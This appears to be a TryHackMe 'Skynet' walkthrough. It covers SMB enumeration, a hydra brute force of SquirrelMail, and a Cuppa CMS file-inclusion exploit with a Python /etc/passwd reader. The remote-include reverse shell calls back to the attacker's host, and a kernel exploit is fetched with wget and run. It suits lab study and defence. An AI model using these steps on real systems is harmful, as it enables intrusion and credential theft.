gkhns/skynet

#Linux #SMB #RFI

skynet: A vulnerable Terminator themed Linux machine

NMAP Scan

  nmap -sV -sC -p- 10.10.14.219
  • To see the versions of the services running (-sV)
  • To perform a script scan using the default set of scripts (-sC)
  • To scan all ports from 1 through 65535 (-p-)

Note that the target IP changes between lab sessions, which is why it differs across the commands in this write-up; substitute your own target and attacker addresses.

OPEN PORTS

  • 22/tcp open ssh
  • 80/tcp open http
  • 110/tcp open pop3
  • 139/tcp open netbios-ssn
  • 143/tcp open imap
  • 445/tcp open microsoft-ds (SMB)

We start with port 80/tcp. The HTML source does not show anything interesting, and the buttons do not work.


Let's move on to the 'hidden' directories; Gobuster can help us locate them:

  gobuster dir -u http://10.10.14.219 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt


This scan takes a while. The following directories were listed after the first few minutes:

  • /admin (Status 301)
  • /css (Status 301)
  • /js (Status 301)
  • /config (Status 301)
  • /ai (Status 301)
  • /squirrelmail (Status 301) -- Check this out!
  • /server-status


Searchsploit lists no documented exploit for SquirrelMail version 1.4.23, so the webmail login itself is not the way in; we need credentials first.


OK, let's switch to port 445/tcp, the SMB server. We can use enum4linux to enumerate it:

  enum4linux -a 10.10.14.219
  • To do all simple enumerations (-a)

There are interesting results, such as the known usernames:


Here are the sharenames:


We can use smbclient to enter the anonymous share (-N skips the password prompt, giving a null session):

  smbclient -N '\\10.10.48.162\anonymous'

  # If you need to enter a share with a username (you will be prompted for the password)
  smbclient -U milesdyson '\\10.10.246.55\milesdyson'
  

The share holds a number of log files; one of them, log1.txt, is a password list for the email account milesdyson.

Let's use hydra to brute-force the SquirrelMail login with that list (F=incorrect tells hydra which string in the response marks a failed attempt; -F stops at the first valid pair):

hydra -l milesdyson -P log1.txt 10.10.48.162 http-post-form "/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^:F=incorrect" -V -F -u


We now have access to the email account!


There is a Samba Password Reset email providing a new password. Those credentials let us log in to the milesdyson SMB share, where a document titled important.txt reveals a 'hidden directory' (45kra24zxs28v3yd, used in the URLs below). Running Gobuster against that directory shows another directory, /administrator, which turns out to host Cuppa CMS, as the Gobuster screenshot shows.


Now, let's check searchsploit for documented vulnerabilities in Cuppa CMS:


  searchsploit -m php/webapps/25971.txt
  # VULNERABILITY: PHP CODE INJECTION (file inclusion)
  # An attacker can include local or remote PHP files, or read non-PHP files, through this vulnerability.
  # User-tainted data is used to build the file name that is included into the current file. PHP code in
  # that file is evaluated; non-PHP content is embedded in the output. This can lead to full server compromise.

  # The vulnerable parameter is urlConfig; for a local file read we pass a traversal path:
  /alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

  # so the full URL becomes (quoted so the shell does not interpret ? and &):
  curl 'http://10.10.74.120/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd'
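A small helper for the local-file-read step above, added here as an example and not part of the original write-up or of the exploit-db entry. It assumes the URL layout shown on this page (hidden directory plus administrator/alerts/alertConfigField.php) and embeds a constructed /etc/passwd sample so it runs offline; the uid values in that sample are made up. Passing a base URL as the first argument runs the same check against a live lab target and lists which accounts have a real login shell, which is the candidate list for the credentials found later.

```python
"""Helper for the urlConfig local-file-read step (added example, not from the
original write-up). Assumes the path layout shown on this page; the sample
/etc/passwd body below is constructed, not captured from the box."""
import re
import sys
import urllib.parse
import urllib.request

# Vulnerable script relative to the hidden directory, as in the curl above.
VULN_PATH = "administrator/alerts/alertConfigField.php"

# One /etc/passwd entry: name:pw:uid:gid:gecos:home:shell
PASSWD_LINE = re.compile(r"^([^:\s]+):[^:]*:(\d+):(\d+):[^:]*:([^:]*):([^:\n]*)$", re.M)

# Constructed sample of a successful read (uid/gid values are made up).
SAMPLE_BODY = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
    "sync:x:4:65534:sync:/bin:/bin/sync\n"
    "milesdyson:x:1001:1001:,,,:/home/milesdyson:/bin/bash\n"
)


def build_lfi_url(base, target_file, depth=9):
    """Return the full URL that makes urlConfig include `target_file`.

    `depth` '../' segments are prepended; extra ones past '/' are harmless,
    so a generous count is the usual choice."""
    traversal = "../" * depth + target_file.lstrip("/")
    query = urllib.parse.urlencode({"urlConfig": traversal}, safe="/")
    return f"{base.rstrip('/')}/{VULN_PATH}?{query}"


def fetch(url, timeout=10):
    """Plain GET; only used when a live base URL is given on the command line."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


def looks_like_passwd(body):
    """True when the response embeds an /etc/passwd file rather than an error page."""
    return re.search(r"^root:[^:]*:0:0:", body, re.M) is not None


def login_users(body):
    """(name, uid, shell) for accounts that can actually log in."""
    users = []
    for name, uid, _gid, _home, shell in PASSWD_LINE.findall(body):
        if shell and not shell.endswith(("/nologin", "/false", "/sync")):
            users.append((name, int(uid), shell))
    return users


if __name__ == "__main__":
    base = sys.argv[1] if len(sys.argv) > 1 else "http://10.10.74.120/45kra24zxs28v3yd"
    url = build_lfi_url(base, "/etc/passwd")
    print("GET", url)
    body = fetch(url) if len(sys.argv) > 1 else SAMPLE_BODY
    if not looks_like_passwd(body):
        sys.exit("no /etc/passwd in response: wrong path, depth, or not vulnerable")
    for name, uid, shell in login_users(body):
        print(f"{name:<12} uid={uid:<6} shell={shell}")
```

The success check keys on the root entry rather than on HTTP status, because the vulnerable script answers 200 with an empty or error body when the include fails; that is the case you need to tell apart from a genuine hit when the traversal depth is wrong.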

Now, we can work on the reverse shell:

STEP 1: Generate the reverse shell and save it on the local host (here it is called RS.php). It must point at your own IP and at the port the listener will use in step 3.

STEP 2: Open up an HTTP server to serve the payload to the target machine

  sudo python3 -m http.server 80

STEP 3: Turn on the listener (sudo is needed because 87 is a privileged port)

  sudo nc -lvnp 87

STEP 4: Modify the PHP injection URL so that urlConfig points at the payload on our HTTP server:

  curl 'http://10.10.74.120/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.18.123.93:80/RS.php'

STEP 5: The target fetches RS.php from our HTTP server, includes and executes it, and the shell connects back to the listener. Remote inclusion only works because the server has allow_url_include enabled; with it off, the same parameter is still good for local file inclusion.

Niceeee!! it works:

(Screenshot 2022-05-27 191059: an overall summary of the steps followed)
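Why the urlConfig parameter is exploitable, and the check that closes it, as an added example in Python. This is not Cuppa CMS code (which is PHP) and not part of the original write-up: it is a stand-in for an include() fed straight from a request parameter, beside a resolver that confines the include to one directory. The base directory /srv/app/administrator and the .php-only rule are assumptions for illustration; the two attacker values are the local read and the remote shell URL used on this page.

```python
"""Why the urlConfig include is exploitable and the check that closes it.
Added example, not Cuppa CMS code: a Python stand-in for an include() fed
by a request parameter, beside a resolver that confines it to one directory.
Base directory and extension rule are assumptions for illustration."""
import os
from urllib.parse import urlsplit


def vulnerable_resolve(base_dir, user_value):
    """What the vulnerable pattern effectively does: trust the parameter.
    A scheme ('http://', 'php://') is passed straight to include(), and
    '../' segments walk out of the intended directory."""
    if "://" in user_value:
        return user_value          # remote include when allow_url_include is on
    return os.path.join(base_dir, user_value)


def safe_resolve(base_dir, user_value, allowed_ext=(".php",)):
    """Resolve `user_value` under `base_dir` or raise ValueError.

    Order matters: reject wrappers/URLs first (realpath would not understand
    them), then canonicalise and compare prefixes on the *resolved* path so
    symlinks and '..' cannot help the attacker."""
    if urlsplit(user_value).scheme or user_value.startswith("//"):
        raise ValueError("remote include rejected")
    if "\x00" in user_value:
        raise ValueError("NUL byte rejected")
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, user_value))
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError("path escapes include directory")
    if not candidate.endswith(allowed_ext):
        raise ValueError("unexpected extension")
    return candidate


def check(base_dir, user_value):
    """'ok' or the rejection reason, for logging or tests."""
    try:
        safe_resolve(base_dir, user_value)
        return "ok"
    except ValueError as exc:
        return str(exc)


if __name__ == "__main__":
    BASE = "/srv/app/administrator"   # assumed location of the CMS admin area
    for value in (
        "alerts/fields/text.php",
        "../../../../../../../../../etc/passwd",   # the local read used on this page
        "http://10.18.123.93:80/RS.php",            # the remote shell used on this page
        "php://filter/convert.base64-encode/resource=index.php",
    ):
        print(f"{value!r:60} vulnerable -> {vulnerable_resolve(BASE, value)}")
        print(f"{'':60} hardened   -> {check(BASE, value)}")
```

Even the hardened resolver is the second-best fix: where the set of includable files is known in advance, map the parameter to a fixed allowlist of names and never build a path from user input at all.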

Next step is stabilizing the shell:

  python3 -c 'import pty;pty.spawn("/bin/bash");'   # on the target: spawn a real TTY
  CTRL+Z                                             # background the shell
  stty raw -echo; fg                                 # on the attacker: pass keystrokes through, then resume
  export TERM=xterm                                  # on the target: so clear, vim and the like work

Privilege Escalation

Here, I followed the procedure explained in the following reference: https://ratiros01.medium.com/tryhackme-skynet-bdce0537fe7d

Step 1: Find the kernel version

uname -a


Step 2: Search for kernel exploits

searchsploit linux kernel 4.8.0

searchsploit -m linux/local/43418.c
# Copies the exploit source into the current directory on the attacker machine

# On the target, from a writable directory such as /tmp, fetch it from the HTTP server started earlier
wget http://10.18.123.93/43418.c

# Compile and run it on the target
gcc 43418.c -o pwn
./pwn


About

Try Hack Me - skynet
